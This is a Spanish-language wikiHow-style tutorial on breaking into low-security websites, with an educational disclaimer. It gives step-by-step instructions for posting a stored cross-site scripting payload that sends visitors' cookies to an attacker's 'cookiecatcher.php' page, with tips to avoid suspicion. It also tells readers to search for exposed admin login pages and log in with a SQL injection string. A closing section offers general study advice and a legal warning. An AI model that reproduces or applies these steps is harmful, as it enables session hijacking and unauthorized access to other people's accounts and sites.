Descargar el PDF Descargar el PDF

Nota : el presente artículo está creado estrictamente con fines educativos, ya sea para ayudar a las personas a aprender a convertirse en un hacker de sombrero blanco o bien para demostrar cómo deben trabajar los hackers para proteger mejor sus sitios web. El presente tutorial te facilitará los pasos para obtener acceso a muchos sitios web de baja seguridad.

Método 1
Método 1 de 3:

Con Cross Site Scripting

Descargar el PDF
  1. Un tablón de anuncios es un buen ejemplo. Recuerda, si el sitio es seguro, esto no funcionará.
  2. Necesitarás introducir un código especial en la "publicación" que capturará los datos de todos los que hagan clic en ella.
    • Intenta averiguar si los filtros del sistema filtran el código externo. Publica <script...>alert("test")</...script> (eliminando los "…"). Si un cuadro de alerta aparece cuando haces clic en la publicación, entonces el sitio es vulnerable a ataques.
  3. El objetivo de este ataque es capturar las cookies de los usuarios, que te permitirán acceder a sus cuentas en sitios webs que tengan inicios de sesión vulnerables. Necesitarás un capturador de cookies que capturará las cookies de tu objetivo y las redirigirá. Sube el capturador a un sitio web al cual tengas acceso y que soporte php . Más adelante te daremos un ejemplo de código de capturador de cookies.
  4. Ingresa un código apropiado en la publicación para capturar las cookies y enviarlas a tu sitio. Te recomendamos poner algún texto luego del código para reducir las sospechas y evitar que tu publicación sea eliminada.
    • Un código de ejemplo sería: <...iframe... frameborder= 0 height=0 width=0 src=javascript...:void(document.location="YOURURL/cookiecatcher.php?c="+document.cookie)><.../iframe> (eliminando los "…").
  5. Luego, podrás utilizar la información de las cookies, que ya estarán guardadas en tu sitio web con el propósito que necesites.
    Anuncio
Método 2
Método 2 de 3:

Ejecuta ataques de inyección

Descargar el PDF
  1. Necesitarás encontrar un sitio que sea vulnerable por tener un inicio de sesión del administrador al que pueda accederse fácilmente. Intenta buscar en Google admin login.asp.
  2. Inicia sesión como administrador . Escribe "admin" como nombre de usuario y utiliza alguna de las distintas cadenas de caracteres como contraseña. Estas pueden ser alguna de las diferentes cadenas pero un ejemplo común sería 1’o’1’=’1.
  3. Ten paciencia . Esto podría requerir varias pruebas y errores.
  4. Al final, se supone que encontrarás un hilo que te dé acceso de administrador a algún sitio web, si este es vulnerable a ataques.
    Anuncio
Método 3
Método 3 de 3:

Prepárate para tener éxito

Descargar el PDF
  1. Aprende uno o dos lenguajes de programación . Si realmente quieres aprender a hackear sitios web, necesitarás comprender cómo funcionan las computadoras y otras tecnologías. Aprende a utilizar lenguajes de programación tales como Python o SQL, de forma tal que puedas adquirir un mayor control sobre las computadoras e identificar vulnerabilidades en los sistemas.
  2. Aprende HTML básico. También necesitarás tener una amplia comprensión de html y javascript si pretendes hackear sitios web en particular. Aprenderlo puede llevar algún tiempo, pero existen muchas formas gratuitas de aprender por Internet, así que seguramente tendrás la oportunidad si quieres aprovecharla.
  3. Los hackers de sombrero blanco son hackers que utilizan sus potencialidades para el bien, al exponer vulnerabilidades en la seguridad y al hacer de Internet un mejor lugar para todos. Si tienes ganas de aprender a hackear y utilizar tus habilidades para el bien o si quieres proteger tu propio sitio web, te recomendamos contactarte con algún hacker de sombrero blanco para pedirle sus consejos.
  4. Si tienes ganas de aprender a hackear o simplemente quieres protegerte, necesitarás investigar mucho sobre el tema. Existen demasiadas formas en las cuales un sitio web puede ser vulnerable y la lista cambia constantemente, así que deberás seguir aprendiendo en forma permanente.
  5. Ya que la lista de posibles ataques cambia constantemente, necesitarás asegurarte de estar siempre al día. ¡El hecho de que puedas protegerte de algún tipo de ataque, no significa que estarás a salvo en el futuro!
    Anuncio

Consejos

  • Visita foros de hackers para obtener consejos útiles.
  • Este tutorial es estrictamente para motivos educativos, ya sea para ayudar a las personas a aprender a hackear o para ver cómo trabajan los hackers para proteger mejor sus sitios web.
Anuncio

Advertencias

  • Leer nuestro artículo no te convertirá inmediatamente en un hacker. Deberás explorar tus habilidades y practicar sin cesar.
  • Hackear de mala fe un sitio web (para obtener ilícitamente información confidencial, robar dinero o planificar secuestros) es un crimen que conlleva sanciones penales sumamente severas de muchos años de prisión, aun de cadena perpetua.
Anuncio

Acerca de este wikiHow

Esta página ha recibido 159 507 visitas.

¿Te ayudó este artículo?

Anuncio